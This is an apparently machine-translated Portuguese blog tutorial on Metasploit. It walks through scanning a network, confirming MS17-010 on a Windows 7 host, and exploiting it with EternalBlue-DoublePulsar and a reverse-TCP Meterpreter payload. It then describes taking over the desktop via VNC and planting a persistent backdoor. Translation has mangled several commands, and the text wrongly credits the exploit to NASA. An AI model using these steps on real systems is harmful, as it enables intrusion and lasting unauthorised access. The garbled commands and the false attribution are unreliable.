metasploit

Tutorial Metasploit

Tutorial Metasploit

Como já discutimos as 25 MELHORES FERRAMENTAS KALI LINUX, e colocamos o METASPLOIT em primeiro lugar na lista, agora vamos discutir e aprender sobre o METASPLOIT. Recomendamos que você se familiarize com o Metasploit.

Metasploit inicialmente criado por H. D Moore em 2003, até ser adquirido e desenvolvido pela Rapid7 em 21 de outubro de 2009. Metasploit-framework é completamente escrito em Ruby, e é um pacote padrão instalado no sistema Kali Linux (e também quase todos os sistemas operacionais de teste de penetração, eu acho). É um kit favorito de hackers ou testadores de penetração para pesquisar vulnerabilidades de segurança, desenvolver e executar exploits em alvos e outros desenvolvimentos de segurança.

O Metasploit vem com várias edições, geralmente divididas em duas categorias, versão gratuita e versão paga. As versões gratuitas: Metasploit Framework Community Edition (interface baseada em CLI) e Armitage (interface baseada em GUI). As versões pagas: Metasploit Express, Metasploit Pro e Cobalt Strike (é semelhante ao Armitage, que é fornecido pela Strategic Cyber ​​LLC).

Metasploit permite aos usuários criar (ou desenvolver) seu próprio código de exploração, mas não se preocupe se você não sabe como codificar, Metasploit tem tantos módulos e eles são continuamente atualizados. Atualmente, o Metasploit tem mais de 1600 exploits e 500 payloads. A maneira simples de entender o que são explorações e cargas úteis, uma exploração é basicamente como o invasor entrega a carga útil, através do buraco de vulnerabilidade do sistema de destino.  Uma vez que o invasor lança a exploração que contém uma carga contra o alvo vulnerável, então a carga implantada (carga usada para se conectar de volta ao invasor para obter acesso remoto contra o sistema de destino), neste estágio a exploração é feita e se torna irrelevante.

“Metasploit não é uma ferramenta instantânea de hack, é um framework insano”

Este artigo do Metasploit é sobre a realização de testes de penetração em um sistema alvo usando o seguinte fluxo:


PREPARAÇÃO

Certifique-se de que nosso Kali Linux tenha a última versão atualizada. Haverá melhorias a cada atualização. Execute os seguintes comandos:

~ # atualização apt
~ # atualização apt -y
~ # apt dist-upgrade -y

Assim que nossa máquina estiver atualizada, vamos começar disparando o console metasploit. No terminal, digite:

~ # msfconsole

E também você precisa de qualquer editor de texto, Gedit ou Leafpad, para coletar algumas informações ao longo do caminho antes de compilarmos o ataque. Em primeiro lugar, identifique o endereço IP da interface sem fio, o IP do roteador e a máscara de rede.

Com base nas informações acima, observamos a WLAN1 e o endereço IP do roteador, e a máscara de rede. Portanto, a nota deve ser assim:

IP do invasor (LHOST): 192.168.1.56
IP do gateway / roteador: 192.168.1.1
Máscara de rede: 255.255.255.0 (/ 24)


PASSO 1: VERIFICAÇÃO DE VULNERABILIDADE

No console metasploit, primeiro coletamos informações, como endereço IP de destino, sistema operacional, portas abertas e a vulnerabilidade. Metasploit nos permite executar NMap diretamente do console. Com base nas informações acima, execute este comando para realizar nossa tarefa de coleta de informações.

msf> nmap -v 192.168.1.1/24 - script vuln -Pn -O

Do comando acima, obtivemos o resultado abaixo.

Temos um alvo vulnerável executando o sistema operacional Windows, e o vulnerável está no serviço SMBv1. Então, adicione a nota.

IP alvo (RHOST): 192.168.1.57
Vulnerabilidade: vulnerabilidade de execução remota de código em servidores Microsoft SMBv1 (ms17-010)


ETAPA 2: AVALIAÇÃO DE VULNERABILIDADE

Agora sabemos o alvo e sua vulnerabilidade. Vamos verificar a vulnerabilidade no console metasploit

Agora sabemos o alvo e sua vulnerabilidade. Vamos verificar a vulnerabilidade no console metasploit usando o módulo auxiliar smb_scanner. Execute o seguinte comando:

msf> use auxiliar / scanner / smb / smb_ms17_010
msf auxiliary (smb_ms17_010)> definir RHOSTS [IP de destino]
msf auxiliar (smb_ms17_010)> executar

Metasploit está confiante sobre a vulnerabilidade e mostra exatamente o Windows OS Edition. Adicionar à nota:

SO de destino: Windows 7 Ultimate 7600


PASSO 3: EXPLORANDO

Infelizmente, o metasploit não tem módulo de exploração relacionado a esta vulnerabilidade. Mas, não se preocupe, há um cara do lado de fora exposto e escreveu o código de exploração. A exploração é familiar, uma vez que é iniciada pela NASA, é chamada de EternalBlue-DoublePulsar. Você pode obtê-lo aqui ou seguir o guia do vídeo tutorial abaixo para instalar o código de exploração em sua estrutura metasploit.

Depois de seguir o guia acima, (certifique-se de que o caminho seja o mesmo do tutorial). Agora, você está pronto para explorar o alvo. Execute os seguintes comandos:

use exploit / windows / smb / eternalblue_doublepulsar
definir janelas de carga útil / meterpreter / reverse_tcp
definir PROCESSINJECT spoolsv.Exe
definir RHOST 192.168.1.57
definir LHOST 192.168.1.56

Explorar

Boom ... O exploit foi bem-sucedido, temos sessão de medidor. Como mencionei antes, uma vez que o exploit seja lançado, ele irá implantar a carga útil, que é, aqui usamos, windows /medidor/ reverse_tcp.


PASSO 4: OBTENDO ACESSO REMOTO

Vamos explorar os comandos mais disponíveis, digite '?'(sem ponto de interrogação) e veja os comandos disponíveis listados. O Stdapi, os comandos do sistema são:

Para ver mais informações sobre o sistema de destino, use 'sysinfo'comando. A saída deve ser semelhante a esta.

Uma vez que injetamos no processo do sistema mais cedo (spoolsv.exe), temos privilégios de sistema. Nós possuímos o alvo. Podemos fazer muito com o comando para o alvo. Por exemplo, podemos executar o RDP ou apenas definir o VNC remoto. Para executar o serviço VNC, digite o comando:

~ # run vnc

O resultado deve ser o desktop da máquina de destino, é parecido com este.

A parte mais importante é criar um backdoor, então sempre que o alvo se desconectar de nossa máquina, a máquina alvo tentará se conectar de volta, novamente para nós. A porta dos fundos é usada para manter o acesso, é como pescar, você não vai jogar o peixe de volta na água depois de pegá-lo, certo? Você quer fazer algo com o peixe, seja guardá-lo na geladeira para outras ações, como cozinhá-lo ou vendê-lo por dinheiro.

Meterpreter tem esta função de backdoor persistentemente. Execute o seguinte comando e dê uma olhada nos parâmetros e argumentos disponíveis.

meterpreter> execute persistence -h

Se você não está confortável com este script obsoleto, o módulo de persistência mais recente está em post / windows / manage / persistence_exe. Você pode explorar mais por conta própria.

Metasploit é enorme, não é apenas uma ferramenta, é um framework, considere que tem mais de 1600 exploits e cerca de 500 payloads. Um artigo é adequado para o panorama geral do uso ou ideia geral. Mas você aprendeu muito com este artigo.

“Quanto mais você segue o fluxo de ataque, mais você tem um desafio sem esforço.”

Como baixar e jogar Sid Meier's Civilization VI no Linux
Introdução ao jogo Civilization 6 é uma versão moderna do conceito clássico introduzido na série de jogos Age of Empires. A ideia era bastante simples...
Como instalar e jogar Doom no Linux
Introdução ao Doom A série Doom teve origem nos anos 90 após o lançamento do Doom original. Foi um sucesso instantâneo e, a partir desse momento, a sé...
Vulkan para usuários de Linux
A cada nova geração de placas gráficas, vemos os desenvolvedores de jogos ultrapassarem os limites da fidelidade gráfica e se aproximarem mais do foto...